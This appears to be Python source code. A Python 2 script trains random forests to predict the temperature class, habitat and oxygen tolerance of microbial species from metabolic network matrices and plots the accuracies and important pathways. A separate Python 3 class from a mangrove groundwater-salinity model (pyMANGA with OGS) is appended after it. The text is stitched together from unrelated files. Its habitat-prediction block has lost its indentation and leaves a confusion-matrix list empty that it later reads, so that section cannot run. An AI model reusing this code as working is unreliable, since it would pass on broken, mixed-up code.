    thresh = cm.max() / 2.
    for i in range(cm.shape[0]):
        for j in range(cm.shape[1]):
            ax.text(j, i, format(cm[i, j], fmt),
                    ha="center", va="center", fontsize=14,
                    color="white" if cm[i, j] > thresh else "black")
    plt.xlim(-0.5, len(np.unique(classes))-0.5)
    plt.ylim(len(np.unique(classes))-0.5, -0.5)
    plt.xlabel("Predicted", fontsize=16)
    plt.ylabel('True', fontsize=16)
    plt.xticks(fontsize=14)
    plt.yticks(fontsize=14)
    plt.tight_layout()
    return ax
def mask_kmer(i_list, kmer_action, *args):
    """
    Mask the given columns of one or more binary (0/1) arrays, in place.

    "invert" flips each masked value (0 becomes 1 and 1 becomes 0); "zeros"
    and "ones" force the masked columns to 0 or 1 respectively.

    Parameters
    ----------
    i_list : list
        list of column indexes to mask.
    kmer_action : str
        Among "invert", "zeros", "ones".
    *args :
        Binary arrays whose columns are masked (modified in place).

    Returns
    -------
    list of modified arrays
    """
    assert kmer_action in ["invert", "zeros", "ones"], "Invalid k-mer action."
    masked_arrays = []
    for arr in args:
        # refuse anything that is not strictly 0/1 valued
        assert all([v in [0, 1] for v in np.unique(arr)]), "Non 0/1 binary array"
        if kmer_action == "invert":
            arr[:, i_list] = np.abs(arr[:, i_list] - 1)
        else:
            arr[:, i_list] = 0 if kmer_action == "zeros" else 1
        masked_arrays.append(arr)
    return masked_arrays
def save_csv_pred(y, df, col_list, fname):
    """Dump the ``col_list`` columns of ``df`` together with the random
    forest predictions ``y`` (column ``randomF_prediction``) to the CSV file
    ``fname`` without the index column."""
    out = df.loc[:, col_list].copy()
    out["randomF_prediction"] = y
    out.to_csv(fname, index=False)
class RandomForestClassifierClass:
    """Convenience wrapper bundling a scikit-learn random forest with its
    data matrix, class labels, class weights and the train/test/validation
    splitting used throughout this script.

    NOTE(review): this file is Python 2 (``print`` statements, ``xrange``,
    ``cPickle``); run it under a Python 2 interpreter.
    """

    def __init__(self, matrix, classes, weights, ntrees, kwargs):
        # matrix: features x samples; it is transposed to samples x features
        # when the splits are built in train_test_validation()
        self.matrix = matrix
        # classes: one label per sample (column of ``matrix``)
        self.classes = classes
        self.class_weights = weights
        self.ntrees = ntrees
        # extra keyword arguments forwarded verbatim to RandomForestClassifier
        self.kwargs = kwargs

    def train_test_validation(self):
        # First split: keep 90% as the working pool and hold out 10% as an
        # independent validation set (presumably preserving class
        # proportions -- confirm against utils_general.train_test_proportions).
        self.data, self.data_v, self.y, self.y_v, _, _ = train_test_proportions(.9, self.matrix.T, self.classes)
        # Second split: 66% of the pool for training, the rest for testing.
        self.X_train, self.X_test, self.y_tr, self.y_t, _, _ = train_test_proportions(.66, self.data, self.y)

    def rf_model_fit(self):
        # Build the forest with the configured class weights / tree count
        # and fit it on the training split.
        self.clf = RandomForestClassifier(class_weight=self.class_weights,
                                          n_estimators=self.ntrees, **self.kwargs)
        self.clf.fit(self.X_train, self.y_tr)

    def predict(self, data, y=False, text=""):
        # Predict labels for ``data``; when true labels ``y`` are supplied,
        # also print the accuracy preceded by ``text``.
        y_pred = self.clf.predict(data)
        if np.any(y) != False:
            print text, sum(y_pred == y)/float(len(y))
        return y_pred

    def predict_test(self, y=True):
        # Predict on the internal test split; ``y=True`` prints the accuracy.
        if np.any(y) != False:
            y = self.y_t
        self.y_pred = self.predict(self.X_test, y, text="Accuracy testing dataset:")
        return self.y_pred

    def predict_valid(self, y=True):
        # Predict on the held-out validation split; ``y=True`` prints accuracy.
        if np.any(y) != False:
            y = self.y_v
        self.y_pred_v = self.predict(self.data_v, y, text="Accuracy validation dataset:")
        return self.y_pred_v

    def mask_analysis(self, step=50, brk=False, acc_print=True, plot=True):
        """
        K-mer analysis, inverting matrix values in *step*-size sliding window, and plotting (and printing) the resulting
        accuracy
        step - sliding window size
        brk - Defaults to False. Stop sliding when accuracy inferior to brk.
        return accuracies of each mask
        """
        if plot:
            plt.figure(figsize=(10,7))
            # horizontal baseline: unmasked validation accuracy
            plt.axhline(sum(self.y_pred_v == self.y_v)/float(len(self.y_v)), c="r")
        accs = []
        for i in range(0, self.matrix.T.shape[1]):
            # window of ``step`` columns starting at i, clipped at the edge
            i_list = [i+n for n in range(step) if i+n < self.matrix.T.shape[1]]
            # invert the window on a copy so data_v itself stays untouched
            X_v_k = mask_kmer(i_list, "invert", deepcopy(self.data_v))[0]
            y_pred2 = self.clf.predict(X_v_k)
            if plot:
                plt.scatter(i, sum(y_pred2 == self.y_v)/float(len(self.y_v)), c="k")
            if acc_print:
                print i, step, sum(y_pred2 == self.y_v)/float(len(self.y_v))
            accs.append(sum(y_pred2 == self.y_v)/float(len(self.y_v)))
            if brk and sum(y_pred2 == self.y_v)/float(len(self.y_v)) < brk:
                # NOTE(review): the mismatch mask is computed against the
                # validation labels ``self.y_v`` but indexes into the test
                # labels ``self.y_t``; ``self.y_v`` looks intended -- verify.
                print Counter([tuple(coupl)  # Wrong class - correct one numbers
                               for coupl in np.vstack((y_pred2[y_pred2 != self.y_v],
                                                       self.y_t[y_pred2 != self.y_v])).T
                               ])
                break
        if plot:
            plt.ylabel("Accuracy")
            plt.xlabel("Position of first compound in mask")
            plt.title("Mask size: {}".format(step))
            plt.plot()
        return accs
if __name__ == '__main__':
    # Load the precomputed scope matrix (nodes x species) and node names
    # produced by scope_kegg_prk.py, plus the per-species metadata table.
    backup_dir = "backup_cpkl/"
    med_name = "PsychroMesoThermHyperMedium"
    #The following files are generated by scope_kegg_prk.py
    simplified_matrix = cpk.load(open(joinP(backup_dir, "simplified_matrix_scope{}_prk.cpk".format(med_name)), "rb"))
    nodes_simplified = cpk.load(open(joinP(backup_dir, "simplified_nodes_scope{}_prk.cpk".format(med_name)), "rb"))
    df_species = pd.read_csv("species_metadata.csv", index_col=0)
    df_species.loc[df_species.sp_codes.isnull(), "sp_codes"] = "nan"  # Otherwise interpreted as NaN

    # =============================================================================
    #
    # TEMPERATURE CLASS PREDICTION
    #
    # =============================================================================
    # Keep only species with a known temperature class.
    matrix_temp = simplified_matrix[:, df_species.temp_range_deduced.notnull()]
    classes = df_species.temp_range_deduced[df_species.temp_range_deduced.notnull()].values

    accuracy_v = []
    gini = []
    mat = []
    mask_min50 = []  # NOTE(review): never used below -- candidate for removal
    f1_scores_temp = []
    depths = []
    cv_n = 300
    for cv in xrange(cv_n):  #cross validation
        print cv
        # Random 300 mesophiles so as to balance classes: index of matrix without temp null values
        no_meso = sorted(list(np.where(classes != "mesophilic")[0]) +
                         list(np.random.choice(np.where(classes == "mesophilic")[0],
                                               300, replace=False)
                              ))
        matrix_T300 = matrix_temp[:, no_meso]
        classesT300 = classes[no_meso]
        # weights: class frequency / total (782 subsampled species)
        tclass300RF = RandomForestClassifierClass(matrix=matrix_T300,
                                                  classes=classesT300,
                                                  weights={"mesophilic": 300./782,
                                                           "thermophilic": 188./782,
                                                           "hyperthermophilic": 76./782,
                                                           "psychrophilic": 218./782},
                                                  ntrees=1000,
                                                  kwargs={})
        # Split dataset
        tclass300RF.train_test_validation()
        # Fit on train dataset
        tclass300RF.rf_model_fit()
        # Test dataset prediction
        tclass300RF.predict_test()
        # True validation - independent testing set
        tclass300RF.predict_valid()
        accuracy_v.append(sum(tclass300RF.y_pred_v == tclass300RF.y_v) / float(len(tclass300RF.y_v)))
        f1_scores_temp.append(
            f1_score(tclass300RF.y_v, tclass300RF.y_pred_v,
                     labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"],
                     average="micro"))
        #Real as lines, preds as cols
        m = confusion_matrix(tclass300RF.y_v, tclass300RF.y_pred_v,
                             labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"],)
        mat.append(m)
        #Get depth
        max_dpth = max([dectree.tree_.max_depth for dectree in tclass300RF.clf.estimators_])
        depths.append(max_dpth)
        # Feature importances: names of the 50 nodes with highest Gini importance
        gini_50_nodes = nodes_simplified[np.argsort(tclass300RF.clf.feature_importances_)[::-1]][:50]
        gini.append(gini_50_nodes)
    print "Accuracy:", np.mean(accuracy_v), np.std(accuracy_v)
    print "F1-score:", np.mean(f1_scores_temp), np.std(f1_scores_temp)

    # Plot cross-validation boxplot of accuracies per class
    m_diag = [np.diag(m) for m in mat]
    plt.figure(figsize=(10, 7))
    sns.boxplot(data=(np.array(m_diag) / np.sum(mat[0], axis=1).astype(float)),
                palette=sns.color_palette(["#d82f00", "goldenrod", "lightgreen", "#41a5b7", ]))
    plt.xticks(range(4), ["HT", "T", "M", "P"], fontsize=16)
    plt.ylabel("Accuracy", fontsize=18)
    plt.xlabel("Temperature class", fontsize=18)
    plt.yticks(fontsize=16)
    plt.ylim(0, 1.05)
    # Mean confusion matrix over all cross-validation runs
    m_mean = deepcopy(mat[0])
    for m in mat[1:]:
        m_mean += m
    print m_mean / float(cv_n)
    # row-normalize the mean matrix before plotting
    norm = (m_mean / float(cv_n)).astype('float') / (m_mean / float(cv_n)).sum(axis=1)[:, np.newaxis]
    plot_confusion_matrix(norm, ["HT", "T", "M", "P"],
                          normalize=False,
                          cmap=plt.cm.YlGnBu)

    # Most important nodes for model prediction, and pathways to which they belong
    c_gini = Counter(np.concatenate(gini))  #Counter of nodes all
    c, pathways = get_pathways_from_nodes(c_gini.keys())  #pathways= equivalence node-pathways, c= counter of pathways in values of pathways dict (not weigthed by apparition of nodes)
    pathways_g = []  #all nodes transformed by its equivalence
    for n in np.concatenate(gini):
        # strip the reaction suffix (_0, _1, ...) to get the enzyme id
        n = n.split("_")[0]
        pathways_g += pathways[n]
    c_all = Counter(np.array(pathways_g)[:, 1])  #Counter of pathways all (weighted by the repetitions of nodes)
    c_mean = Counter({key: v / float(cv_n) for key, v in c_all.items()})
    # Per-cross-validation pathway counts, used for the standard deviation.
    pathways_lists = []
    c_std = {ky: 0 for ky in c_mean.keys()}
    for crssv in gini:
        pathways_lists.append([])
        for nod in crssv:
            nod = nod.split("_")[0]
            pathways_lists[-1] += [p[1] for p in pathways[nod]]
    for pthway in c_mean.keys():
        for crssv in pathways_lists:
            c_cv = Counter(crssv)
            c_std[pthway] += (c_cv[pthway] - c_mean[pthway])**2
    for pthway in c_mean.keys():
        c_std[pthway] = np.sqrt(c_std[pthway]/float(cv_n))

    #Histogram index nodes per number of models
    index_nodes = {ky: list(nodes_simplified).index(ky) for ky in c_gini.keys()}
    c_gini_idx = {index_nodes[ky]: v for ky, v in c_gini.items()}
    plt.figure(figsize=(10, 7))
    plt.bar(range(len(c_gini_idx)), np.array(sorted(c_gini_idx.values(), reverse=True)) * 100./cv_n)  #plots the number of model counts per union of 50 most important nodes for all models.
    plt.xlabel("Nodes", fontsize=16)
    plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
    plt.xticks(fontsize=16)
    plt.yticks(fontsize=16)
    plt.xlim(0, 177)
    plt.tight_layout()

    #Mean of tree max depths
    print np.mean(depths)

    #Species x 17 nodes amongst union of "50 most important nodes" present in 90% of models matrix
    nods17 = ['1.1.1.38_0', '1.1.1.38_1', '1.1.1.40_0', '1.1.1.40_1', '1.4.1.4', '1.8.1.7', '3.5.1.1', '4.3.1.1',
              '4.3.3.6_1', '6.3.2.2', '6.3.2.3', '7.3.2.6', 'C00127', 'C00208', 'C00385', 'C00669', 'C20679']
    mat_17 = np.genfromtxt("matrix_speciesX17impNodes.csv")
    #add column for 1.1.1.38_0, same as 1.1.1.38_1
    mat_17 = np.hstack((mat_17[:, 0].reshape(5610, 1), mat_17))
    # per-class row indexes into the species metadata
    HT_i = np.where(df_species.temp_range_deduced == "hyperthermophilic")[0]
    T_i = np.where(df_species.temp_range_deduced == "thermophilic")[0]
    M_i = np.where(df_species.temp_range_deduced == "mesophilic")[0]
    P_i = np.where(df_species.temp_range_deduced == "psychrophilic")[0]
    # order nodes by (HT+T presence) - (M+P presence), most thermo-specific first
    sort_for_fig = np.argsort(np.sum(mat_17[HT_i, :], axis=0)/float(len(HT_i)) +
                              np.sum(mat_17[T_i, :], axis=0)/float(len(T_i)) -
                              np.sum(mat_17[M_i, :], axis=0)/float(len(M_i)) -
                              np.sum(mat_17[P_i, :], axis=0)/float(len(P_i))
                              )[::-1]
    x = np.arange(17)  # the label locations
    width = 0.8  # the width of the bars
    fig, ax = plt.subplots()
    rects1 = ax.bar(x - width/4. - width/8., (np.sum(mat_17[HT_i, :], axis=0)/float(len(HT_i)))[sort_for_fig], width/4., label="HT", color="#d82f00")
    rects2 = ax.bar(x - width/8., (np.sum(mat_17[T_i, :], axis=0)/float(len(T_i)))[sort_for_fig], width/4., label='T', color="goldenrod")
    rects2 = ax.bar(x + width/8., (np.sum(mat_17[M_i, :], axis=0)/float(len(M_i)))[sort_for_fig], width/4., label='M', color="lightgreen")
    rects2 = ax.bar(x + width/4. + width/8., (np.sum(mat_17[P_i, :], axis=0)/float(len(P_i)))[sort_for_fig], width/4., label='P', color="#41a5b7")
    ax.set_xticks(x)
    print list(np.array(nods17)[sort_for_fig])  #Tick labels manually modified because _0 was after _1
    ax.set_xticklabels(['4.3.3.6_1', '7.3.2.6', 'C20679', '1.1.1.38_0', '1.1.1.38_1',
                        '4.3.1.1', '3.5.1.1', '1.4.1.4', 'C00208', '6.3.2.3', '1.8.1.7',
                        'C00385', '1.1.1.40_0', '1.1.1.40_1', '6.3.2.2', 'C00669', 'C00127'], fontsize=12)
    ax.set_yticklabels(["0", "0.2", "0.4", "0.6", "0.8"], fontsize=12)
    ax.legend(fontsize=14)
    ax.set_ylabel("Proportion of species", fontsize=16)
    ax.set_xlabel("17 common important nodes", fontsize=16)
    fig.tight_layout()
    # =============================================================================
    # DIFFERENTIAL GENOMICS RF TCLASS
    # =============================================================================
    # Same temperature-class prediction, but on raw gene (enzyme) content
    # instead of the metabolic scope matrix.
    all_nodes = cpk.load(open("backup_cpkl/all_nodes_union_prk.cpk", "rb"))
    enzs_only_db = np.array(sorted([n for n in all_nodes if is_enz(n)]))
    # indexes of duplicated reaction nodes (suffix _1, _2, ...) to drop
    indx_to_remove = [i for i, enz in enumerate(enzs_only_db) if not enz.endswith("_0") and not len(enz.split("_")) == 1]
    gene_mat = np.load("enzs_per_sp.npy")  #sp x enzymes
    gene_mat_temp_doubles = gene_mat[df_species.temp_range_deduced.notnull(), :].T
    # DIFFERENTIAL GENOMICS FOR GENES WITH ENZYMES (no _1, _2, ...)
    # Our graphs consider reactions (appended by _0, _1 if multiple reactions per enzyme).
    # Here, enzymes are considered, so when duplicates (_1, _2) are removed
    gene_mat_temp_nodoubles = np.delete(gene_mat_temp_doubles, indx_to_remove, 0)
    enzs_only_nodouble = enzs_only_db[[i for i in range(len(enzs_only_db)) if i not in indx_to_remove]]
    gene_mat_temp_ = gene_mat_temp_nodoubles
    enzs_only = enzs_only_nodouble

    accuracy_v_DG = []
    gini_DG = []
    mat_DG = []
    f1_scores_DG = []
    cv_n = 300
    depths_DG = []
    # when True, subsample 300 mesophiles per run to balance the classes
    if300_DG = True
    for cv in xrange(cv_n):  #cross validation
        print cv
        if if300_DG:
            no_meso = sorted(list(np.where(classes != "mesophilic")[0]) +
                             list(np.random.choice(np.where(classes == "mesophilic")[0],
                                                   300, replace=False)
                                  ))
            gene_mat_temp = gene_mat_temp_[:, no_meso]
            classes_DG = classes[no_meso]
            w = {"mesophilic": 300./782,
                 "thermophilic": 188./782,
                 "hyperthermophilic": 76./782,
                 "psychrophilic": 218./782}
        else:
            # full dataset: weights computed over all 3392 species
            classes_DG = classes
            w = {"mesophilic": 2910./3392,
                 "thermophilic": 188./3392,
                 "hyperthermophilic": 76./3392,
                 "psychrophilic": 218./3392}
            gene_mat_temp = gene_mat_temp_
        tempclassRF_DG = RandomForestClassifierClass(matrix=gene_mat_temp,
                                                     classes=classes_DG,
                                                     weights=w,
                                                     ntrees=1000,
                                                     kwargs={})
        # Split dataset
        tempclassRF_DG.train_test_validation()
        # Fit on train dataset
        tempclassRF_DG.rf_model_fit()
        # Test dataset prediction
        tempclassRF_DG.predict_test()
        # True validation - independent testing set
        tempclassRF_DG.predict_valid()
        accuracy_v_DG.append(sum(tempclassRF_DG.y_pred_v == tempclassRF_DG.y_v)/float(len(tempclassRF_DG.y_v)))
        f1_scores_DG.append(
            f1_score(tempclassRF_DG.y_v, tempclassRF_DG.y_pred_v,
                     labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"],
                     average="micro"))
        #Real as lines, preds as cols
        m = confusion_matrix(tempclassRF_DG.y_v, tempclassRF_DG.y_pred_v, labels=["hyperthermophilic", "thermophilic", "mesophilic", "psychrophilic"])
        mat_DG.append(m)
        # Feature importances
        gini_50_nodes = enzs_only[np.argsort(tempclassRF_DG.clf.feature_importances_)[::-1]][:50]
        gini_DG.append(gini_50_nodes)
        # Get depth
        max_dpth = max([dectree.tree_.max_depth for dectree in tempclassRF_DG.clf.estimators_])
        depths_DG.append(max_dpth)

    # Plot cross-validation boxplot of accuracies per class
    m_diag_DG = [np.diag(m) for m in mat_DG]
    plt.figure(figsize=(10, 7))
    sns.boxplot(data=(np.array(m_diag_DG) / np.sum(mat_DG[0], axis=1).astype(float)),
                palette=sns.color_palette(["#d82f00", "goldenrod", "lightgreen", "#41a5b7", ]))
    plt.xticks(range(4), ["HT", "T", "M", "P"], fontsize=16)
    plt.ylabel("Accuracy", fontsize=18)
    plt.xlabel("Temperature class", fontsize=18)
    plt.yticks(fontsize=16)
    plt.ylim(0, 1.05)
    print np.mean(accuracy_v_DG)
    print np.std(accuracy_v_DG)
    print np.mean(f1_scores_DG)
    print np.std(f1_scores_DG)
    # Mean confusion matrix over all cross-validation runs
    m_mean_DG = deepcopy(mat_DG[0])
    for m in mat_DG[1:]:
        m_mean_DG += m
    print m_mean_DG / float(cv_n)
    # for row in range(4):
    #     print ((m_mean_DG / float(cv_n))[row, :]/np.sum(mat_DG[0], axis=1)[row]*100)
    norm_DG = (m_mean_DG / float(cv_n)).astype('float') / (m_mean_DG / float(cv_n)).sum(axis=1)[:, np.newaxis]
    plot_confusion_matrix(norm_DG, ["HT", "T", "M", "P"],
                          normalize=False,
                          cmap=plt.cm.YlGnBu)
    # Most important nodes for model prediction, and pathways to which they belong
    c_gini_DG = Counter(np.concatenate(gini_DG))
    c_DG, pathways_DG = get_pathways_from_nodes(c_gini_DG.keys())
    pathways_g_DG = []
    for n in np.concatenate(gini_DG):
        n = n.split("_")[0]
        pathways_g_DG += pathways_DG[n]
    c_all_DG = Counter(np.array(pathways_g_DG)[:, 1])
    c_mean_DG = Counter({key: v / float(cv_n) for key, v in c_all_DG.items()})
    # Histogram index nodes per number of models
    index_nodes_DG = {ky: list(enzs_only).index(ky) for ky in c_gini_DG.keys()}
    c_gini_idx_DG = {index_nodes_DG[ky]: v for ky, v in c_gini_DG.items()}
    plt.figure(figsize=(10, 7))
    plt.bar(range(len(c_gini_idx_DG)), np.array(sorted(c_gini_idx_DG.values(),
                                                       reverse=True)) * 100. / cv_n)  # plots the number of model counts per union of 50 most important nodes for all models.
    plt.xlabel("Nodes", fontsize=16)
    plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
    plt.xticks(fontsize=16)
    plt.yticks(fontsize=16)
    plt.tight_layout()
    # Mean of tree max depths
    print np.mean(depths_DG)
# =============================================================================
#
# SIMPLIFIED HABITAT PREDICTION
#
# =============================================================================
matrix_hab = simplified_matrix[:, df_species.habMix.notnull()]
classesHmix = df_species.habMix[df_species.habMix.notnull()].values
accuracy_v_habMix = []
gini_habMix = []
mat_habMix = []
f1_scores_habMix = []
depths_habMix = []
cv_n = 300
for cv in xrange(cv_n): #cross validation
print cv
habitatRF = RandomForestClassifierClass(matrix=matrix_hab,
classes=classesHmix,
weights={"Environment": 0.33,
"Symbiont": 0.47,
"Mixed":0.20,
},
ntrees=1000,
kwargs={})
# Split dataset
habitatRF.train_test_validation()
# Fit on train dataset
habitatRF.rf_model_fit()
# Test dataset prediciton
habitatRF.predict_test()
# True validation - independent testing set
habitatRF.predict_valid()
accuracy_v_habMix.append(sum(habitatRF.y_pred_v == habitatRF.y_v) / float(len(habitatRF.y_v)))
f1_scores_habMix.append(f1_score(habitatRF.y_v, habitatRF.y_pred_v, labels=["Environment", "Symbiont", "Mixed"],
average="micro"))
# Feature importances
gini_50_nodes = nodes_simplified[np.argsort(habitatRF.clf.feature_importances_)[::-1]][:50]
gini_habMix.append(gini_50_nodes)
#Get depth
max_dpth = max([dectree.tree_.max_depth for dectree in habitatRF.clf.estimators_])
depths_habMix.append(max_dpth)
print np.mean(accuracy_v_habMix)
print np.std(accuracy_v_habMix)
print np.mean(f1_scores_habMix)
print np.std(f1_scores_habMix)
# Plot cross-validation boxplot of accuracies per class
m_diag_habMix = [np.diag(m) for m in mat_habMix]
plt.figure(figsize=(10, 7))
sns.boxplot(data=(np.array(m_diag_habMix) / np.sum(mat_habMix[0], axis=1).astype(float)),
palette=sns.color_palette(["lightgreen", "#d82f00", "goldenrod", ]))
plt.xticks(range(3), ["Environment", "Symbiont", "Mixed"], fontsize=18)
plt.ylabel("Accuracy", fontsize=20)
plt.xlabel("Habitat", fontsize=20)
plt.yticks(fontsize=18)
plt.ylim(0, 1.05)
# Mean matrix o
m_mean_habMix = deepcopy(mat_habMix[0])
for m in mat_habMix[1:]:
m_mean_habMix += m
print m_mean_habMix / float(cv_n)
norm_habMix = (m_mean_habMix / float(cv_n)).astype('float') / (m_mean_habMix / float(cv_n)).sum(axis=1)[:, np.newaxis]
plot_confusion_matrix(norm_habMix, ["Environment", "Symbiont", "Mixed"],
normalize=False,
cmap=plt.cm.YlGnBu)
c_gini_habMix = Counter(np.concatenate(gini_habMix))
c, pathways = get_pathways_from_nodes(c_gini_habMix.keys())
pathways_g_habMix = []
for n in np.concatenate(gini_habMix):
n = n.split("_")[0]
pathways_g_habMix += pathways[n]
c_all_habMix = Counter(np.array(pathways_g_habMix)[:, 1])
c_mean_habMix = Counter({key: v / float(cv_n) for key, v in c_all_habMix.items()})
#Histogram index nodes per number of models
index_nodes_habMix = {ky:list(nodes_simplified).index(ky) for ky in c_gini_habMix.keys()}
c_gini_idx_habMix = {index_nodes_habMix[ky]:v for ky, v in c_gini_habMix.items()}
plt.figure(figsize=(10,7))
plt.bar(range(len(c_gini_idx_habMix)), np.array(sorted(c_gini_idx_habMix.values(), reverse=True)) * 100./cv_n) #plots the number of model counts per union of 50 most important nodes for all models.
plt.xlabel("Nodes", fontsize=16)
plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.xlim(0, 177)
plt.tight_layout()
#Mean of tree max depths
print np.mean(depths_habMix)
    # =============================================================================
    #
    # OXYGEN TOLERANCE PREDICTION
    #
    # =============================================================================
    # Predict the (simplified) oxygen tolerance from the metabolic scope matrix.
    matrix_oxygenSimpl = simplified_matrix[:, df_species.oxySimpl.notnull()]
    classesOsimpl = df_species.oxySimpl[df_species.oxySimpl.notnull()].values

    accuracy_v_oxySimp = []
    gini_oxySimp = []
    mat_oxySimp = []
    f1_scores_oxySimp = []
    depths_oxySimp = []
    cv_n = 300
    for cv in xrange(cv_n):  # cross validation
        print cv
        # weights: class frequency / total (2231 species with known tolerance)
        oxySimp = RandomForestClassifierClass(matrix=matrix_oxygenSimpl,
                                              classes=classesOsimpl,
                                              weights={"Aerobe": 917./2231,
                                                       "Facultative": 782/2231.,
                                                       "Anaerobe": 532./2231,
                                                       },
                                              ntrees=1000,
                                              kwargs={})
        # Split dataset
        oxySimp.train_test_validation()
        # Fit on train dataset
        oxySimp.rf_model_fit()
        # Test dataset prediction
        oxySimp.predict_test()
        # True validation - independent testing set
        oxySimp.predict_valid()
        accuracy_v_oxySimp.append(sum(oxySimp.y_pred_v == oxySimp.y_v) / float(len(oxySimp.y_v)))
        f1_scores_oxySimp.append(f1_score(oxySimp.y_v, oxySimp.y_pred_v,
                                          labels=['Aerobe', 'Facultative', 'Anaerobe'],
                                          average="micro"))
        # Feature importances
        gini_50_nodes = nodes_simplified[np.argsort(oxySimp.clf.feature_importances_)[::-1]][:50]
        gini_oxySimp.append(gini_50_nodes)
        # Get depth
        max_dpth = max([dectree.tree_.max_depth for dectree in oxySimp.clf.estimators_])
        depths_oxySimp.append(max_dpth)
        # Real as lines, preds as cols
        m = confusion_matrix(oxySimp.y_v, oxySimp.y_pred_v,
                             labels=['Aerobe', 'Facultative',
                                     'Anaerobe'])
        mat_oxySimp.append(m)
    print np.mean(f1_scores_oxySimp)
    print np.std(f1_scores_oxySimp)
    print np.mean(accuracy_v_oxySimp)
    print np.std(accuracy_v_oxySimp)
    # Plot cross-validation boxplot of accuracies per class
    m_diag_oxySimp = [np.diag(m) for m in mat_oxySimp]
    plt.figure(figsize=(10, 7))
    sns.boxplot(data=(np.array(m_diag_oxySimp) / np.sum(mat_oxySimp[0], axis=1).astype(float)), )
    #             palette=sns.color_palette(["lightgreen", "#d82f00", "goldenrod", ]))
    plt.xticks(range(3), ['Aerobe', 'Facultative',
                          'Anaerobe'], fontsize=16)
    plt.ylabel("Accuracy", fontsize=20)
    plt.xlabel("Oxygen Tolerance", fontsize=20)
    plt.yticks(fontsize=18)
    plt.ylim(0, 1.05)
    # Mean confusion matrix over all cross-validation runs
    m_mean_oxySimp = deepcopy(mat_oxySimp[0])
    for m in mat_oxySimp[1:]:
        m_mean_oxySimp += m
    print m_mean_oxySimp / float(cv_n)
    norm_oxySimp = (m_mean_oxySimp / float(cv_n)).astype('float') / (m_mean_oxySimp / float(cv_n)).sum(axis=1)[:, np.newaxis]
    plot_confusion_matrix(norm_oxySimp, ["Aerobe", "Facultative", "Anaerobe"],
                          normalize=False,
                          cmap=plt.cm.YlGnBu)
    # Most important nodes for model prediction, and pathways to which they belong
    c_gini_oxySimp = Counter(np.concatenate(gini_oxySimp))
    c, pathways = get_pathways_from_nodes(c_gini_oxySimp.keys())
    pathways_g_oxySimp = []
    for n in np.concatenate(gini_oxySimp):
        n = n.split("_")[0]
        pathways_g_oxySimp += pathways[n]
    c_all_oxySimp = Counter(np.array(pathways_g_oxySimp)[:, 1])
    c_mean_oxySimp = Counter({key: v / float(cv_n) for key, v in c_all_oxySimp.items()})
    # Histogram index nodes per number of models
    index_nodes_oxySimp = {ky: list(nodes_simplified).index(ky) for ky in c_gini_oxySimp.keys()}
    c_gini_idx_oxySimp = {index_nodes_oxySimp[ky]: v for ky, v in c_gini_oxySimp.items()}
    plt.figure(figsize=(10, 7))
    plt.bar(range(len(c_gini_idx_oxySimp)), np.array(sorted(c_gini_idx_oxySimp.values(), reverse=True)) * 100. / cv_n)  # plots the number of model counts per union of 50 most important nodes for all models.
    plt.xlabel("Nodes", fontsize=16)
    plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
    plt.xticks(fontsize=16)
    plt.yticks(fontsize=16)
    plt.xlim(0, 177)
    plt.tight_layout()
    # Mean of tree max depths
    print np.mean(depths_oxySimp)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@date: 2018-Today
@author: <EMAIL>
"""
import numpy as np
from TreeModelLib.BelowgroundCompetition.OGSLargeScale3D import OGSLargeScale3D
from lxml import etree
from os import path
import os
## OGS integration for belowground competition concept. This case is
# using the OGS software to calculate changes in pore water salinity using
# a detailed groundwater model. Here, no Feedback is considered.
# @param args: Please see input file tag documentation for details
# @date: 2019 - Today
class OGSWithoutFeedback(OGSLargeScale3D):
    ## Constructor: unless the project file requests reuse of previously
    #  saved results ("use_old_ogs_results" tag set to "True"), the OGS
    #  groundwater model is run once up front; its salinity field is then
    #  reused for every MANGA timestep (no feedback).
    #  @param args: Please see input file tag documentation for details
    def __init__(self, args):
        super().__init__(args)
        tag = args.find("use_old_ogs_results")
        if tag is not None and tag.text == "True":
            print("pyMANGA is using old results from previously saved" +
                  " numpy arrays.")
        else:
            self.runOGSOnce()

    ## This function calculates the mean salinity by given abiotic drivers.
    #  The resulting salinities are used for each MANGA timestep since there
    #  is no feedback considered here.  Stale result arrays from a previous
    #  run are removed first so they cannot be picked up accidentally.
    def runOGSOnce(self):
        try:
            print("Trying to remove previous results...")
            # NOTE: if the first file is missing, the second removal is
            # skipped too (pre-existing behavior, kept on purpose).
            os.remove(
                path.join(path.dirname(path.dirname(path.abspath(__file__))),
                          "OGSWithoutFeedback/cumsum_salinity.npy"))
            os.remove(
                path.join(path.dirname(path.dirname(path.abspath(__file__))),
                          "OGSWithoutFeedback/calls_in_last_timestep.npy"))
            print("Previous results removed.")
        except FileNotFoundError:
            print("No files found.")
        self._t_end = float(self._xml_t_end.text)
        self.copyPythonScript()
        # zeroed contributions/prefactors => plain (feedback-free) OGS run
        self._constant_contributions = np.zeros_like(self._volumes)
        self._salinity_prefactors = np.zeros_like(self._volumes)
        np.save(
            path.join(self._ogs_project_folder, "constant_contributions.npy"),
            self._constant_contributions)
        np.save(path.join(self._ogs_project_folder, "salinity_prefactors.npy"),
                self._salinity_prefactors)
        current_project_file = path.join(self._ogs_project_folder,
                                         "pymanga_" + self._ogs_project_file)
        self._tree.write(current_project_file)
        print("Calculating belowground resources distribution using ogs...")
        bc_path = (path.dirname(path.dirname(path.abspath(__file__))))
        if not (os.system(bc_path + "/OGS/bin/ogs " + current_project_file +
                          " -o " + self._ogs_project_folder +
                          " -l error") == 0):
            raise ValueError("Ogs calculation failed!")
        print("OGS-calculation done.")

    ## This function updates and returns BelowgroundResources in the current
    #  timestep. For each tree a reduction factor is calculated which is
    #  defined as: resource uptake at zero salinity/ real resource uptake.
    def calculateBelowgroundResources(self):
        cumsum_salinity = np.load(
            path.join(self._ogs_project_folder, "cumsum_salinity.npy"))
        calls_per_cell = np.load(
            path.join(self._ogs_project_folder, "calls_in_last_timestep.npy"))
        # mean salinity per cell over the calls of the last OGS timestep
        # (assumes every cell was called at least once -- otherwise 0/0)
        salinity = cumsum_salinity / calls_per_cell
